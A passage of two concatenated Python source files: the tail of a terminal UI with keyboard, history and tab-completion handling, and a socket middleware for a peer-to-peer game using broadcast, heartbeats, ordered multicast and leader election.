# check for screen buffer's new screen
x = self.sb.get()
# we have a new screen to draw
if x:
self.clear_screen()
self.async_keys.draw(x)
sys.stdout.write(x.getvalue())
sys.stdout.flush()
# maybe we need to redraw the keys
elif self.keys_redraw.should_redraw():
sys.stdout.write("\x1b[4A")
self.async_keys.draw(sys.stdout)
sys.stdout.flush()
# reset the policer for next time
self.keys_redraw.reset()
def get_state (self):
return self.state
class TokenParser(object):
def __init__ (self, seq):
self.buffer = list(seq)
def pop (self):
return self.buffer.pop(0)
def peek (self):
if not self.buffer:
return None
return self.buffer[0]
def next_token (self):
if not self.peek():
return None
token = self.pop()
# special chars
if token == '\x1b':
while self.peek():
token += self.pop()
return token
def parse (self):
tokens = []
while True:
token = self.next_token()
if token == None:
break
tokens.append(token)
return tokens
# handles async IO
class AsyncKeys:
MODE_LEGEND = 1
MODE_CONSOLE = 2
STATUS_NONE = 0
STATUS_REDRAW_KEYS = 1
STATUS_REDRAW_ALL = 2
def __init__ (self, client, console, save_console_history, tui_global_lock, locked = False):
self.tui_global_lock = tui_global_lock
self.engine_console = AsyncKeysEngineConsole(self, console, client, save_console_history)
self.engine_legend = AsyncKeysEngineLegend(self)
self.locked = locked
if locked:
self.engine = self.engine_legend
self.locked = True
else:
self.engine = self.engine_console
self.locked = False
def __enter__ (self):
# init termios
self.old_settings = termios.tcgetattr(sys.stdin)
new_settings = termios.tcgetattr(sys.stdin)
new_settings[3] = new_settings[3] & ~(termios.ECHO | termios.ICANON) # lflags
new_settings[6][termios.VMIN] = 0 # cc
new_settings[6][termios.VTIME] = 0 # cc
# huge buffer - no print without flush
sys.stdout = open('/dev/stdout', 'w', TrexTUI.MIN_COLS * TrexTUI.MIN_COLS * 2)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, new_settings)
return self
def __exit__ (self, type, value, traceback):
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.old_settings)
# restore sys.stdout
sys.stdout.close()
sys.stdout = sys.__stdout__
def is_legend_mode (self):
return self.engine.get_type() == AsyncKeys.MODE_LEGEND
def is_console_mode (self):
return self.engine.get_type == AsyncKeys.MODE_CONSOLE
def switch (self):
if self.is_legend_mode():
self.engine = self.engine_console
else:
self.engine = self.engine_legend
def handle_token (self, token, pm):
# ESC for switch
if token == '\x1b':
if not self.locked:
self.switch()
return self.STATUS_REDRAW_ALL
# EOF (ctrl + D)
if token == '\x04':
raise TUIQuit()
# pass tick to engine
return self.engine.tick(token, pm)
def tick (self, pm):
rc = self.STATUS_NONE
# fetch the stdin buffer
seq = os.read(sys.stdin.fileno(), 1024).decode('ascii', errors = 'ignore')
if not seq:
return self.STATUS_NONE
# parse all the tokens from the buffer
tokens = TokenParser(seq).parse()
# process them
for token in tokens:
token_rc = self.handle_token(token, pm)
rc = max(rc, token_rc)
return rc
def draw (self, buffer):
self.engine.draw(buffer)
# Legend engine
class AsyncKeysEngineLegend:
def __init__ (self, async):
self.async_ = async
def get_type (self):
return self.async_.MODE_LEGEND
def tick (self, seq, pm):
if seq == 'q':
raise TUIQuit()
if len(seq) > 1:
if seq == '\x1b\x5b\x41': # scroll up
pm.handle_key('Up')
if seq == '\x1b\x5b\x42': # scroll down
pm.handle_key('Down')
if seq == '\x1b\x5b\x43': # scroll right
pm.handle_key('Right')
if seq == '\x1b\x5b\x44': # scroll left
pm.handle_key('Left')
return AsyncKeys.STATUS_NONE
rc = pm.handle_key(seq)
return AsyncKeys.STATUS_REDRAW_ALL if rc else AsyncKeys.STATUS_NONE
def draw (self, buffer):
pass
# console engine
class AsyncKeysEngineConsole:
def __init__ (self, async_, console, client, save_console_history):
self.async_ = async_
self.lines = deque(maxlen = 100)
self.generate_prompt = console.generate_prompt
self.save_console_history = save_console_history
self.ac = client.get_console_methods()
self.ac.update({'quit' : self.action_quit,
'q' : self.action_quit,
'exit' : self.action_quit,
'help' : self.action_help,
'?' : self.action_help})
# fetch readline history and add relevants
for i in range(1, readline.get_current_history_length()):
cmd = readline.get_history_item(i)
if cmd.strip() and cmd.split()[0] in self.ac:
self.lines.appendleft(CmdLine(cmd))
# new line
self.lines.appendleft(CmdLine(''))
self.line_index = 0
self.last_status = ''
def action_quit (self, _):
raise TUIQuit()
def action_help (self, _):
return ' '.join([format_text(cmd, 'bold') for cmd in self.ac.keys()])
def get_type (self):
return self.async_.MODE_CONSOLE
def handle_escape_char (self, seq):
# up
if seq == '\x1b[A':
self.line_index = min(self.line_index + 1, len(self.lines) - 1)
# down
elif seq == '\x1b[B':
self.line_index = max(self.line_index - 1, 0)
# left
elif seq == '\x1b[D':
self.lines[self.line_index].go_left()
# right
elif seq == '\x1b[C':
self.lines[self.line_index].go_right()
# del
elif seq == '\x1b[3~':
self.lines[self.line_index].del_key()
# home
elif seq in ('\x1b[H', '\x1b\x4fH'):
self.lines[self.line_index].home_key()
# end
elif seq in ('\x1b[F', '\x1b\x4fF'):
self.lines[self.line_index].end_key()
# Alt + Backspace
elif seq == '\x1b\x7f':
pos = orig_pos = self.lines[self.line_index].cursor_index
cut_to_pos = None
line = self.lines[self.line_index].get()
while pos >= 1:
if pos == 1:
cut_to_pos = 0
elif line[pos - 1] != ' ' and line[pos - 2] == ' ':
cut_to_pos = pos - 1
break
pos -= 1
if cut_to_pos is not None:
self.lines[self.line_index].set(line[:cut_to_pos] + line[orig_pos:], cut_to_pos)
# Alt + Left or Ctrl + Left
elif seq in ('\x1b[\x31\x3B\x33\x44', '\x1b[\x31\x3B\x35\x44'):
pos = self.lines[self.line_index].cursor_index
move_to_pos = None
line = self.lines[self.line_index].get()
while pos >= 1:
if pos == 1:
move_to_pos = 0
elif line[pos - 1] != ' ' and line[pos - 2] == ' ':
move_to_pos = pos - 1
break
pos -= 1
if move_to_pos is not None:
self.lines[self.line_index].cursor_index = move_to_pos
# Alt + Right or Ctrl + Right
elif seq in ('\x1b[\x31\x3B\x33\x43', '\x1b[\x31\x3B\x35\x43'):
pos = self.lines[self.line_index].cursor_index
move_to_pos = None
line = self.lines[self.line_index].get()
while pos <= len(line) - 1:
if pos == len(line) - 1:
move_to_pos = len(line)
elif line[pos] != ' ' and line[pos + 1] == ' ':
move_to_pos = pos + 1
break
pos += 1
if move_to_pos is not None:
self.lines[self.line_index].cursor_index = move_to_pos
# PageUp
elif seq == '\x1b\x5b\x35\x7e':
line_part = self.lines[self.line_index].get()[:self.lines[self.line_index].cursor_index]
index = self.line_index
while index < len(self.lines) - 1:
index += 1
if self.lines[index].get().startswith(line_part):
self.lines[index].cursor_index = self.lines[self.line_index].cursor_index
self.line_index = index
break
# PageDown
elif seq == '\x1b\x5b\x36\x7e':
line_part = self.lines[self.line_index].get()[:self.lines[self.line_index].cursor_index]
index = self.line_index
while index > 0:
index -= 1
if self.lines[index].get().startswith(line_part):
self.lines[index].cursor_index = self.lines[self.line_index].cursor_index
self.line_index = index
break
# unknown key
else:
return AsyncKeys.STATUS_NONE
return AsyncKeys.STATUS_REDRAW_KEYS
def tick (self, seq, _):
# handle escape chars
if len(seq) > 1:
return self.handle_escape_char(seq)
# handle each char
for ch in seq:
return self.handle_single_key(ch)
def handle_single_key (self, ch):
# newline
if ch == '\n':
self.handle_cmd()
# backspace
elif ch == '\x7f':
self.lines[self.line_index].backspace()
# TAB
elif ch == '\t':
tokens = self.lines[self.line_index].get().split()
if not tokens:
return
if len(tokens) == 1:
self.handle_tab_names(tokens[0])
else:
self.handle_tab_files(tokens)
# simple char
else:
self.lines[self.line_index] += ch
return AsyncKeys.STATUS_REDRAW_KEYS
# handle TAB key for completing function names
def handle_tab_names (self, cur):
matching_cmds = [x for x in self.ac if x.startswith(cur)]
common = os.path.commonprefix([x for x in self.ac if x.startswith(cur)])
if common:
if len(matching_cmds) == 1:
self.lines[self.line_index].set(common + ' ')
self.last_status = ''
else:
self.lines[self.line_index].set(common)
self.last_status = 'ambigious: '+ ' '.join([format_text(cmd, 'bold') for cmd in matching_cmds])
# handle TAB for completing filenames
def handle_tab_files (self, tokens):
# only commands with files
if tokens[0] not in {'start', 'push'}:
return
# '-f' with no parameters - no partial and use current dir
if tokens[-1] == '-f':
partial = ''
d = '.'
# got a partial path
elif tokens[-2] == '-f':
partial = tokens.pop()
# check for dirs
dirname, basename = os.path.dirname(partial), os.path.basename(partial)
if os.path.isdir(dirname):
d = dirname
partial = basename
else:
d = '.'
else:
return
# fetch all dirs and files matching wildcard
files = []
for x in os.listdir(d):
if os.path.isdir(os.path.join(d, x)):
files.append(x + '/')
elif x.endswith( ('.py', 'yaml', 'pcap', 'cap', 'erf') ):
files.append(x)
# dir might not have the files
if not files:
self.last_status = format_text('no loadble files under path', 'bold')
return
# find all the matching files
matching_files = [x for x in files if x.startswith(partial)] if partial else files
# do we have a longer common than partial ?
common = os.path.commonprefix([x for x in files if x.startswith(partial)])
if not common:
common = partial
tokens.append(os.path.join(d, common) if d is not '.' else common)
# reforge the line
newline = ' '.join(tokens)
if len(matching_files) == 1:
if os.path.isfile(tokens[-1]):
newline += ' '
self.lines[self.line_index].set(newline)
self.last_status = ''
else:
self.lines[self.line_index].set(newline)
self.last_status = ' '.join([format_text(f, 'bold') for f in matching_files[:5]])
if len(matching_files) > 5:
self.last_status += ' ... [{0} more matches]'.format(len(matching_files) - 5)
def split_cmd (self, cmd):
s = cmd.split(' ', 1)
op = s[0]
param = s[1] if len(s) == 2 else ''
return op, param
def handle_cmd (self):
cmd = self.lines[self.line_index].get().strip()
if not cmd:
return
op, param = self.split_cmd(cmd)
func = self.ac.get(op)
if func:
with self.async_.tui_global_lock:
func_rc = func(param)
# take out the empty line
empty_line = self.lines.popleft()
assert(empty_line.ro_line == '')
if not self.lines or self.lines[0].ro_line != cmd:
self.lines.appendleft(CmdLine(cmd))
# back in
self.lines.appendleft(empty_line)
self.line_index = 0
readline.add_history(cmd)
self.save_console_history()
# back to readonly
for line in self.lines:
line.invalidate()
assert(self.lines[0].modified == False)
color = None
if not func:
self.last_status = "unknown command: '{0}'".format(format_text(cmd.split()[0], 'bold'))
else:
# internal commands
if isinstance(func_rc, str):
self.last_status = func_rc
# RC response
else:
# success
if func_rc is None:
self.last_status = format_text("[OK]", 'green')
# errors
else:
err_msgs = ascii_split(str(func_rc))
if not err_msgs:
err_msgs = ['Unknown error']
self.last_status = format_text(clear_formatting(err_msgs[0]), 'red')
if len(err_msgs) > 1:
self.last_status += " [{0} more errors messages]".format(len(err_msgs) - 1)
color = 'red'
# trim too long lines
if ansi_len(self.last_status) > TrexTUI.MIN_COLS:
self.last_status = format_text(self.last_status[:TrexTUI.MIN_COLS] + "...", color, 'bold')
def draw (self, buffer):
buffer.write("\nPress 'ESC' for navigation panel...\n")
buffer.write("status: \x1b[0K{0}\n".format(self.last_status))
buffer.write("\n{0}\x1b[0K".format(self.generate_prompt(prefix = 'tui')))
self.lines[self.line_index].draw(buffer)
# a readline alike command line - can be modified during edit
class CmdLine(object):
def __init__ (self, line):
self.ro_line = line
self.w_line = None
self.modified = False
self.cursor_index = len(line)
def get (self):
if self.modified:
return self.w_line
else:
return self.ro_line
def set (self, line, cursor_pos = None):
self.w_line = line
self.modified = True
if cursor_pos is None:
self.cursor_index = len(self.w_line)
else:
self.cursor_index = cursor_pos
def __add__ (self, other):
assert(0)
def __str__ (self):
return self.get()
def __iadd__ (self, other):
self.set(self.get()[:self.cursor_index] + other + self.get()[self.cursor_index:],
cursor_pos = self.cursor_index + len(other))
return self
def backspace (self):
if self.cursor_index == 0:
return
self.set(self.get()[:self.cursor_index - 1] + self.get()[self.cursor_index:],
self.cursor_index - 1)
def del_key (self):
if self.cursor_index == len(self.get()):
return
self.set(self.get()[:self.cursor_index] + self.get()[self.cursor_index + 1:],
self.cursor_index)
def home_key (self):
self.cursor_index = 0
def end_key (self):
self.cursor_index = len(self.get())
def invalidate (self):
self.modified = False
self.w_line = None
self.cursor_index = len(self.ro_line)
def go_left (self):
self.cursor_index = max(0, self.cursor_index - 1)
def go_right (self):
self.cursor_index = min(len(self.get()), self.cursor_index + 1)
def draw (self, buffer):
buffer.write(self.get())
buffer.write('\b' * (len(self.get()) - self.cursor_index))
|
middleware.py | """
Here are all the sockets.
There shall not be any sockets outside of this file.
There shall be one socket in one seperate thread (multithreading)
for every tcp connections
also one socket in a thread for the udp socket for broadcast
"""
import uuid
import threading
import socket
import ipaddress
from time import sleep
usleep = lambda x: sleep(x/1000_000.0) # sleep for x microseconds
from dataclasses import dataclass
######################################### PARAMETER Constants
BROADCAST_PORT = 61424
BUFFER_SIZE = 1024 # bytes
MSGLEN = 10000 # bytes? # maximum length of message over tcp
SUBNETMASK = "255.255.255.0"
BROADCAST_LISTENER_SLEEP = 10 # microseconds
IP_ADRESS_OF_THIS_PC = socket.gethostbyname(socket.gethostname())
net = ipaddress.IPv4Network(IP_ADRESS_OF_THIS_PC + '/' + SUBNETMASK, False)
BROADCAST_IP = net.broadcast_address.exploded
class Middleware():
#deliveryQueue = Q()
ipAdresses = {} # {uuid: (ipadress, port)} (str , int)
MY_UUID = '' # later changed in the init, it is here to define it as a class variable, so that it is accessable easyly
neighborUUID = None
neighborAlive = False
orderedReliableMulticast_ListenerList = []
def __init__(self,UUID, statemashine):
Middleware.MY_UUID = UUID
self.statemashine = statemashine
self._broadcastHandler = BroadcastHandler()
self._unicastHandler = UDPUnicastHandler()
self._tcpUnicastHandler = TCPUnicastHandler()
self.subscribeTCPUnicastListener(self._updateAdresses)
self.subscribeTCPUnicastListener(self._checkForVotingAnnouncement)
# Create Thread to send heartbeat
self.sendHB = threading.Thread(target=self._sendHeartbeats)
self.sendHB.start()
Middleware.neighborAlive = False
# Subscribe heartbeat handler to udp unicastlistener
self.subscribeUnicastListener(self._listenHeartbeats)
# Subscribe heartbeat lost player handler to tcp unicastlistener
self.subscribeTCPUnicastListener(self._listenLostPlayer)
# For Reliable Muticast with Total Ordering with ISIS-Algorithm
self.highestAgreedSequenceNumber = 0 # sequence Number for Total Ordering (ISIS Algorithm)
self.highestbySelfProposedSeqNumber = 0
self.subscribeTCPUnicastListener(self._responseFor_requestSequenceNumberForMessage)
self.subscribeTCPUnicastListener(self._acceptOrderedMulticast)
# middelware objekt Variables
self._holdBackQueue = HoldBackQ()
self.leaderUUID = ''
# INFO: This works
def findNeighbor(self, ownUUID, ipaddresses):
# only to be called if we don't yet have the neighbor
# make ordered dict - uuid remains dict key
ordered = sorted(ipaddresses.keys())
# if len(ordered)>0:
# print("\nsorted uuid dict:\t")
# print(ordered)
if ownUUID in ordered:
ownIndex = ordered.index(ownUUID)
uuidList = list(ordered)
# add neighbor with larger uuid as neighbor
if uuidList[ownIndex - 1] != ownUUID:
# another uuid exists and it's not our own
print("neighbor is\t")
print(uuidList[ownIndex - 1])
return uuidList[ownIndex - 1]
def _sendHeartbeats(self):
ctr = 0
while True:
Middleware.neighborAlive = False
if not Middleware.neighborUUID:
# we don't yet have a neighbor --> find one
Middleware.neighborUUID = self.findNeighbor(Middleware.MY_UUID, Middleware.ipAdresses)
sleep(1)
else:
# we have a neighbor --> ping it
self.sendMessageTo(Middleware.neighborUUID, 'hbping', Middleware.MY_UUID)
sleep(1)
if ctr < 3 and not Middleware.neighborAlive:
ctr += 1
elif not Middleware.neighborAlive and ctr >= 3:
ctr = 0
# update own ipAdresses
Middleware.ipAdresses.pop(Middleware.neighborUUID, None)
# send update to everyone else
self.multicastReliable('lostplayer', Middleware.neighborUUID)
# check if neighbor is leader
if Middleware.neighborUUID == self.leaderUUID:
self.initiateVoting()
Middleware.neighborUUID = None
elif Middleware.neighborAlive:
ctr = 0
else:
#should never get here. if we do: reset neighbor and counter
Middleware.neighborUUID = None
ctr = 0
def _listenHeartbeats(self, messengeruuid:str, command:str, data:str):
if command == 'hbping':
# respond with alive answer
#print("received ping from\t")
#print(messengeruuid)
self.sendMessageTo(messengeruuid, 'hbresponse', Middleware.MY_UUID)
elif command == 'hbresponse':
# set flag alive
if messengeruuid == Middleware.neighborUUID:
#print("received ping response from\t")
#print(messengeruuid)
Middleware.neighborAlive = True
def _listenLostPlayer(self, messengerUUID:str, clientsocket:socket.socket, command:str, data:str):
if command == 'lostplayer':
# # remove the lost host from the list and look for new neighbor
Middleware.ipAdresses.pop(data, None)
Middleware.neighborUUID = None
@classmethod
def addIpAdress(cls, uuid, addr):
cls.ipAdresses[uuid] = addr
Middleware.neighborUUID = None
def broadcastToAll(self, command:str, data:str=''):
self._broadcastHandler.broadcast(command+':'+data)
def sendMessageTo(self, uuid:str, command:str, data:str=''): # unicast
ipAdress = Middleware.ipAdresses[uuid]
self._unicastHandler.sendMessage(ipAdress, command+':'+data)
def sendTcpMessageTo(self, uuid:str, command:str, data:str=''):
addr = Middleware.ipAdresses[uuid]
self._tcpUnicastHandler.sendMessage(addr, command+':'+data)
def sendTcpRequestTo(self, uuid:str, command:str, data:str=''):
addr = Middleware.ipAdresses[uuid]
return self._tcpUnicastHandler.sendTcpRequestTo(addr, command+':'+data)
def multicastReliable(self, command:str, data:str=''):
message = command+':'+data
for key, addr in Middleware.ipAdresses.items():
if key != Middleware.MY_UUID:
self._tcpUnicastHandler.sendMessage(addr, message)
def multicastOrderedReliable(self, command:str, message:str):
"""multicast using tcp
ordered with Total Ordering using the ISIS algorithm
Args:
command (str): [description]
data (str, optional): [description]. Defaults to ''.
"""
# https://cse.buffalo.edu/~stevko/courses/cse486/spring19/lectures/12-multicast2.pdf
# https://cse.buffalo.edu/~stevko/courses/cse486/spring19/lectures/11-multicast1.pdf
""" • Sender multicasts message to everyone
• Reply with proposed priority (sequence no.)
– Larger than all observed agreed priorities
– Larger than any previously proposed (by self) priority
• Store message in priority queue – Ordered by priority (proposed or agreed)
– Mark message as undeliverable
• Sender chooses agreed priority, re-multicasts message with agreed priority
– Maximum of all proposed priorities
• Upon receiving agreed (final) priority
– Mark message as deliverable
– Reorder the delivery queue based on the priorities
– Deliver any deliverable messages at the front of priority queue
"""
messageID = str(uuid.uuid4())
# add to own holdbackQueue
ownPropodesSeqNum = max(self.highestbySelfProposedSeqNumber, self.highestAgreedSequenceNumber) +1
self._holdBackQueue.append(OrderedMessage(ownPropodesSeqNum, '', '', messageID, Middleware.MY_UUID, False))
self.highestbySelfProposedSeqNumber = ownPropodesSeqNum
proposedSeqNumbers = []
threadsList = []
# make concurrent (multithreaded requests)
for key, addr in Middleware.ipAdresses.items():
if key != Middleware.MY_UUID:
t = threading.Thread(target = self._requestSeqNum, args = (addr,messageID, proposedSeqNumbers))
t.start()
threadsList.append(t)
# wait for the requests to finish
for t in threadsList:
t.join()
proposedSeqNumbers.append(ownPropodesSeqNum)
highestN = max(proposedSeqNumbers)
self.highestAgreedSequenceNumber = max(highestN, self.highestAgreedSequenceNumber)
self._holdBackQueue.updateData(messageID, highestN, command, message)
self.multicastReliable('OrderedMulticast with agreed SeqNum', command+'$'+message+'$'+str(highestN)+'$'+messageID)
def _requestSeqNum(self, addr,messageID, returnsList:list):
command = 'requestSequenceNumberForMessage'
returnsList.append(int( self._tcpUnicastHandler.sendTcpRequestTo(addr,'requestSequenceNumberForMessage'+':'+messageID) ))
# self.subscribeTCPUnicastListener(self._responseFor_requestSequenceNumberForMessage) in middleware.__init__
def _responseFor_requestSequenceNumberForMessage(self, messengerUUID:str, clientsocket:socket.socket, command:str, messageID:str):
if command == 'requestSequenceNumberForMessage':
proposedSeqNum = max(self.highestbySelfProposedSeqNumber, self.highestAgreedSequenceNumber) +1
self.highestbySelfProposedSeqNumber = proposedSeqNum
self._holdBackQueue.append(OrderedMessage(proposedSeqNum, '', '', messageID, messengerUUID, False))
clientsocket.send(str.encode(str(proposedSeqNum) ) )
# socket gets closed after this returns
# self.subscribeTCPUnicastListener(self._acceptOrderedMulticast) in middleware.__init__
def _acceptOrderedMulticast(self, messengerUUID:str, clientsocket:socket.socket, command:str, data:str):
if command == 'OrderedMulticast with agreed SeqNum':
data = data.split('$')
assert len(data) == 4, 'something went wrong with the spliting of the the data'
messageCommand = data[0]
messageData = data[1]
messageSeqNum = int(data[2])
messageID = data[3]
self.highestAgreedSequenceNumber = max(self.highestAgreedSequenceNumber, messageSeqNum)
self._holdBackQueue.updateData(messageID, messageSeqNum, messageCommand, messageData)
def sendIPAdressesto(self,uuid):
command='updateIpAdresses'
s=self.leaderUUID + '$'
for uuid, (addr,port) in Middleware.ipAdresses.items():
s += uuid+','+str(addr)+','+str(port)+'#'
self.sendTcpMessageTo(uuid,command,s)
def subscribeBroadcastListener(self, observer_func):
"""observer_func gets called every time there this programm recieves a broadcast message
Args:
observer_func ([type]): observer_function needs to have func(self, messengerUUID:str, command:str, data:str)
"""
self._broadcastHandler.subscribeBroadcastListener(observer_func)
def subscribeUnicastListener(self, observer_func):
"""observer_func gets called every time this programm recieves a Unicast message
Args:
observer_func ([type]): observer_function needs to have func(self, messengerUUID:str, command:str, data:str)
"""
self._unicastHandler.subscribeUnicastListener(observer_func)
def subscribeTCPUnicastListener(self, observer_func):
"""observer_func gets called every time this programm recieves a Unicast message
Args:
observer_func ([type]): observer_function needs to have observer_func(self, messengerUUID:str, clientsocket:socket.socket, command:str, data:str)
"""
self._tcpUnicastHandler.subscribeTCPUnicastListener(observer_func)
def unSubscribeTCPUnicastListener(self, rmFunc):
self._tcpUnicastHandler.unSubscribeTCPUnicastListener(rmFunc)
@classmethod
def subscribeOrderedDeliveryQ(cls, observer_func):
"""observer_func gets called every time this a new message gets queued in the delivery queue
Args:
observer_func ([type]): observer_function needs to have observer_func(self, messengerUUID:str, command:str, data:str)
"""
cls.orderedReliableMulticast_ListenerList.append(observer_func)
@classmethod
def unSubscribeOrderedDeliveryQ(cls, rmFunc):
# remove all occurences of Function
cls.orderedReliableMulticast_ListenerList = [x for x in cls.orderedReliableMulticast_ListenerList if x != rmFunc]
def _updateAdresses(self, messengerUUID:str, clientsocket, command:str, data:str):
"""_updateAdresses recieves and decodes the IPAdresses List from the function
sendIPAdressesto(self,uuid)
Args:
command (str): if this argument NOT == 'updateIpAdresses' this function returns without doing anything
message (str): list of uuid's and IPAdresses
"""
if command == 'updateIpAdresses':
data = data.split('$')
self.leaderUUID = data[0]
secondArgument = data[1]
removedLastHashtag = secondArgument[0:-1] # everything, but the last character
for addr in removedLastHashtag.split('#'):
addrlist = addr.split(',')
self.addIpAdress(addrlist[0], (addrlist[1], int(addrlist[2])))
# uuid ipadress port of the unicastListener
def _checkForVotingAnnouncement(self, messengerUUID:str, clientsocket:socket.socket, command:str, data:str):
if command == 'voting':
# if same UUID
if data == Middleware.MY_UUID:
# i'm Simon
print('\nI am the new Simon\n')
# reliably multicast my UUID to all players
self.multicastReliable('leaderElected', Middleware.MY_UUID)
# set leaderUUID as my UUID
self.leaderUUID = Middleware.MY_UUID
# set GameState to simon_startNewRound
# self.statemashine.switchStateTo('simon_startNewRound')
# if smaller UUID
elif data < Middleware.MY_UUID:
# send my UUID to neighbour
command = 'voting'
data = Middleware.MY_UUID
#print('\nsend voting command with my UUID (' + Middleware.MY_UUID + ') to lowerNeighbour')
self.sendTcpMessageTo(self.findLowerNeighbour(), command, data)
# if greater UUID
elif data > Middleware.MY_UUID:
# send received UUID to neighbour
command = 'voting'
print('\nsend voting command with recevied UUID (' + data + ') to lowerNeighbour\n')
self.sendTcpMessageTo(self.findLowerNeighbour(), command, data)
elif command == 'leaderElected':
print('new Leader got elected\n')
self.leaderUUID = data
# set GameState to state_player_waitGameStart_f
#self.statemashine.switchStateTo('player_waitGameStart')
# diese Funktion muss aufgerufen werden um ein neues Voting zu starten
def initiateVoting(self):
# send to lowerNeighbour: voting with my UUID
command = 'voting'
data = Middleware.MY_UUID
print('Initiate new Voting!\n')
#print('\nsend voting command with my UUID (' + Middleware.MY_UUID + ') to lowerNeighbour')
self.sendTcpMessageTo(self.findLowerNeighbour(), command, data)
def findLowerNeighbour(self):
ordered = sorted(self.ipAdresses.keys())
ownIndex = ordered.index(Middleware.MY_UUID)
neighbourUUID = ordered[ownIndex - 1]
assert Middleware.MY_UUID != neighbourUUID, 'I am my own neigbour that shouldnt happen'
print('Neighbour: ' + neighbourUUID)
return neighbourUUID
# send to next higher node we start a voting with my UUID
class UDPUnicastHandler():
_serverPort = 0 # later changed in the init, it is here to define it as a class variable, so that it is accessable easyly
def __init__(self):
# Create a UDP socket
self._server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # AF_INET means that this socket Internet Protocol v4 addresses
#SOCK_DGRAM means this is a UDP scoket
self._server_socket.bind(('', 0)) # ('', 0) '' use the lokal IP adress and 0 select a random open port
UDPUnicastHandler._serverPort = self._server_socket.getsockname()[1] # returns the previously selected (random) port
#print("ServerPort = ",UDPUnicastHandler._serverPort)
self.incommingUnicastHistory = []
self._listenerList = [] # observer pattern
# Create Thread to listen to UDP unicast
self._listen_UDP_Unicast_Thread = threading.Thread(target=self._listenUnicast)
self._listen_UDP_Unicast_Thread.start()
def sendMessage(self, addr, message:str):
self._server_socket.sendto(str.encode(Middleware.MY_UUID + '_'+IP_ADRESS_OF_THIS_PC + '_'+str(UDPUnicastHandler._serverPort)+'_'+message), addr)
#print('UnicastHandler: sent message: ', message,"\n\tto: ", addr)
def _listenUnicast(self):
#print("listenUDP Unicast Thread has started and not blocked Progress (by running in the background)")
while True:
#print('\nUnicastHandler: Waiting to receive unicast message...\n')
# Receive message from client
# Code waits here until it recieves a unicast to its port
# thats why this code needs to run in a different thread
try:
data, address = self._server_socket.recvfrom(BUFFER_SIZE)
data = data.decode('utf-8')
#print('UnicastHandler: Received message from client: ', address)
#print('\t\tMessage: ', data)
if data:
data=data.split('_')
messengerUUID = data[0]
messengerIP = data[1]
messengerPort = int(data[2]) # this should be the port where the unicast listener socket
#(of the sender of this message) is listening on
assert address == (messengerIP, messengerPort)
message=data[3]
messageSplit= message.split(':')
assert len(messageSplit) == 2, "There should not be a ':' in the message"
messageCommand = messageSplit[0]
messageData = messageSplit[1]
self.incommingUnicastHistory.append((message, address))
for observer_func in self._listenerList:
observer_func(messengerUUID, messageCommand, messageData)
data[1] = None
except:
print("Connection was lost!")
def subscribeUnicastListener(self, observer_func):
self._listenerList.append(observer_func)
class TCPUnicastHandler():
# this class needs to be initiated after the unicast Handler
def __init__(self):
# Create a TCP socket for listening
self._server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # AF_INET means that this socket Internet Protocol v4 addresses
#SOCK_STREAM means this is a TCP scoket
self._server_socket.bind(('', UDPUnicastHandler._serverPort)) # ('', ) '' use the lokal IP adress and 0 select the same port as the udpUnicastHandler. you can use both protocols on the same port
self.incommingUnicastHistory = []
self._listenerList = [] # observer pattern
# Create Thread to listen to TCP unicast
self._listen_UDP_Unicast_Thread = threading.Thread(target=self._listenTCPUnicast)
self._listen_UDP_Unicast_Thread.start()
def sendMessage(self, addr: tuple, message:str): # open new connection; send message and close immediately
threading.Thread(target = self._sendMessageThread, args = (addr,message)).start()
def _sendMessageThread(self, addr: tuple, message:str):
sendSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # AF_INET means that this socket Internet Protocol v4 addresses
sendSocket.bind(('', 0))
#print('\n\naddr for connect: ', addr)
try:
sendSocket.connect(addr)
messageBytes = str.encode(Middleware.MY_UUID + '_'+IP_ADRESS_OF_THIS_PC + '_'+str(UDPUnicastHandler._serverPort)+'_'+message)
sendSocket.send(messageBytes)
#print('TCPUnicastHandler: sent message: ', message,"\n\tto: ", addr)
except ConnectionRefusedError:
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ERROR')
print('Process on address ', addr, 'is not responding')
finally:
sendSocket.close() # Further sends are disallowed
# ##### send data in chunks
# totalsent = 0
# while totalsent < MSGLEN:
# sent = self.sendSocket.send(messageBytes[totalsent:])
# if sent == 0:
# raise RuntimeError("socket connection broken")
# totalsent = totalsent + sent
# ##### send data in chunks
def sendTcpRequestTo(self, addr:tuple, message:str):
# this is blocking
sendSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # AF_INET means that this socket Internet Protocol v4 addresses
sendSocket.bind(('', 0))
response = None
try:
sendSocket.connect(addr)
messageBytes = str.encode(Middleware.MY_UUID + '_'+IP_ADRESS_OF_THIS_PC + '_'+str(UDPUnicastHandler._serverPort)+'_'+message)
sendSocket.send(messageBytes)
#print('TCPUnicastHandler: sent message: ', message,"\n\tto: ", addr)
response = sendSocket.recv(BUFFER_SIZE).decode('utf-8')
#print('TCPUnicastHandler: got response: ', response,"\n\tfrom: ", addr)
except ConnectionRefusedError:
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ERROR')
print('Process on address ', addr, 'is not connecting')
finally:
sendSocket.close() # close this socket
return response
def _listenTCPUnicast(self):
#print("listenTCP Unicast Thread has started and not blocked Progress (by running in the background)")
self._server_socket.listen(5) # The argument to listen tells the socket library that we want it to queue up as many as 5 connect requests (the normal max) before refusing outside connections.
#https://docs.python.org/3/howto/sockets.html
# https://github.com/TejasTidke/Socket-Programming-TCP-Multithreading/blob/master/server/multiserver.py
while True:
clientsocket, address = self._server_socket.accept()
#print("TCPUnicastHandler has accept() ed a connection")
clientsocket.settimeout(60)
# star a new thread, that is responsible for one new request from one peer.
# in this thread, they can exchange more messages
threading.Thread(target = self._listenToClient, args = (clientsocket,address)).start()
def _listenToClient(self, clientsocket:socket.socket, address):
data = clientsocket.recv(BUFFER_SIZE)
################# recieve data in chunks
# chunks = []
# bytes_recd = 0
# while bytes_recd < MSGLEN:
# chunk = clientsocket.recv(min(MSGLEN - bytes_recd, BUFFER_SIZE))
# if chunk == b'':
# raise RuntimeError("socket connection broken")
# chunks.append(chunk)
# bytes_recd = bytes_recd + len(chunk)
# data = b''.join(chunks)
################# recieve data in chunks
data = data.decode('utf-8')
if data:
